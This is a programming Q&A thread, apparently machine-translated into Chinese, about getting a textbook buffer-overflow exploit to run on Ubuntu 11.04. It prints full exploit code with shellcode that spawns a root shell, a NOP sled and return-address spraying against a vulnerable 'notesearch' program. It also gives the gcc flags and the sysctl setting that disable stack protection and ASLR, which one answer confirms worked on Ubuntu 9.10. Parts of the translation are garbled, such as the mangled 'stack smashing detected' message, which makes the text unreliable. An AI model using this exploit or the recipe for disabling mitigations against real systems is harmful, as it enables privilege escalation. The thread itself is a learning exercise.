在Ubuntu中禁用堆棧碎片保護11.04

Question

我在2007年的MacBook上運行32位Ubuntu 11.04，並且我剛開始學習緩衝區溢出漏洞。我試圖從書中運行示例程序，但是Ubuntu的安全措施使我無法成功執行緩衝區溢出。下面是我試圖運行代碼：

#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68" 
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89" 
"\xe1\xcd\x80"; 

int main(int argc, char *argv[]) { 
    unsigned int i, *ptr, ret, offset=270; 
    char *command, *buffer; 

    command = (char *) malloc(200); 
    bzero(command, 200); // zero out the new memory 

    strcpy(command, "./notesearch \'"); // start command buffer 
    buffer = command + strlen(command); // set buffer at the end 

    if(argc > 1) // set offset 
     offset = atoi(argv[1]); 

    ret = (unsigned int) &i - offset; // set return address 

    for(i=0; i < 160; i+=4) // fill buffer with return address 
     *((unsigned int *)(buffer+i)) = ret; 
    memset(buffer, 0x90, 60); // build NOP sled 
    memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 

    strcat(command, "\'"); 

    system(command); // run exploit 
    free(command); 
} 

我想導致段錯誤的代碼，但我每次運行它時，它與「德藝雙馨檢測棧」的錯誤退出。我試着用以下選項編譯（使用gcc）：

-fno-stack-protector -D_FORTIFY_SOURCE=0 -z execstack 

以各種組合，以及所有在一起。我也嘗試$ sysctl -w kernel.randomize_va_space=0，然後重新編譯，但沒有成功。

請將任何人都可以在執行緩衝區溢出的正確方法是揭示大加讚賞，因爲Ubuntu的內置安全措施

Answer 1

我對現在發生的事情有了更多的瞭解。給定的代碼構造一個緩衝區，然後將其傳遞給一個名爲notesearch的程序，該程序存在緩衝區溢出漏洞。我沒有弄清楚如何禁用當前版本的ubuntu的保護措施，但我嘗試的方法在我的Ubuntu 9.10虛擬機上工作。也就是說，-fno-stack-protector作爲gcc標誌工作，當與sysctl kernel.randomize_va_space = 0配對時，允許在堆棧上執行shellcode的緩衝區溢出。有點解決方法，但運行我的虛擬機很適合我，並允許我繼續閱讀本書中的示例。如果你有興趣學習漏洞，這本書是一本很棒的書。 Here it is

Answer 2

你確定你傳遞-fno-堆棧保護的正確的gcc調用？給定的代碼似乎沒有緩衝區溢出。